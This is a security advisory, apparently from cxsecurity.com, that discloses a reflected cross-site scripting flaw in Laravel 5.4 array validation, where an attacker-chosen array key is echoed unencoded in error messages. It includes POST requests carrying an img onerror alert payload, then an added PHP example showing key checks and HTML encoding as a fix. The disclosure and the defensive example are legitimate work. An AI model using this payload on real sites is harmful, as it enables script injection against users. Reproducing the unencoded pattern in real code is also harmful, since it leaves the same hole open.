Laravel 5.4 Cross Site Scripting

2017.03.07
Credit: MaHDyfo
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Laravel non-persistent XSS in validation of arrays
# Date: 06/03/2017
# Exploit Author: MaHDyfo (mahdyfof[the at sign]gmail.com)
# Vendor Homepage: laravel.com
# Version: 5.4

In Laravel validation rules, assume that you set a rule to accept an array input.

    $this->validate($request, [
        'lessons' => 'required|array',
        'lessons.*' => 'numeric'
    ]);

Here we say that lessons should be an array and that its elements should be numeric.
Now let's enter a non-numeric character to make the validation fail.

POST Request:
    lessons[]=1&lessons[]=4&lessons[]=abc

The response is:
    {"lessons.2":["The lessons.2 must be a number."]}

That's OK up to here. But what if we supply our own index for the array?

POST Request:
    lessons[]=1&lessons[]=4&lessons[example]=abc
Response:
    {"lessons.example":["The lessons.example must be a number."]}

POST Request:
    lessons[]=1&lessons[]=4&lessons[<img src=x onerror='alert(1)'>]=abc
Response:
    {"lessons.<img src=x onerror='alert(1)'>":["The lessons.<img src=x onerror='alert(1)'> must be a number."]}

And it executes the alert with no problem...

You can see that this bug already exists in the official Laravel docs:
https://laravel.com/docs/master/validation#validating-arrays

Maybe the solution is to validate the array values yourself, for example by extending the validation rules.

Regards,
MaHDyfo
Iran
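The reflected array key can be handled at two points: reject arrays that carry anything other than list-style keys before the values are validated, and HTML-encode every message where it is written into a page. The following is an added example, not code from the advisory or from Laravel; it is framework-free PHP, the function names `numericErrors`, `hasOnlyListKeys` and `renderErrors` are hypothetical, and the input is constructed from the request shown in the advisory.

```php
<?php
// Added illustration, not Laravel code; all function names are hypothetical.

// Constructed input, shaped like the parsed POST body in the advisory.
$lessons = [0 => '1', 1 => '4', "<img src=x onerror='alert(1)'>" => 'abc'];

// Mimics the reported behaviour: the client-supplied key is copied
// into the error message without any encoding.
function numericErrors(array $items, string $field): array
{
    $errors = [];
    foreach ($items as $key => $value) {
        if (!is_numeric($value)) {
            $errors["$field.$key"] = ["The $field.$key must be a number."];
        }
    }
    return $errors;
}

// Check 1: accept only list-style arrays (keys 0..n-1 in order),
// so a named or markup-bearing key is rejected before value validation.
function hasOnlyListKeys(array $items): bool
{
    return array_values($items) === $items;
}

// Check 2: HTML-encode every message at the point it is written into a page.
function renderErrors(array $errors): string
{
    $html = '';
    foreach ($errors as $messages) {
        foreach ($messages as $message) {
            $html .= '<li>' . htmlspecialchars($message, ENT_QUOTES, 'UTF-8') . '</li>';
        }
    }
    return "<ul>$html</ul>";
}

$errors = numericErrors($lessons, 'lessons');

if (!hasOnlyListKeys($lessons)) {
    echo "rejected: lessons must be a plain list", PHP_EOL;
}
// Even if the message is kept, encoding makes the key render as text.
echo renderErrors($errors), PHP_EOL;
```

When the errors are returned as JSON instead, the same encoding step belongs in the client code that inserts the message into the DOM.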


Copyright 2018, cxsecurity.com

 
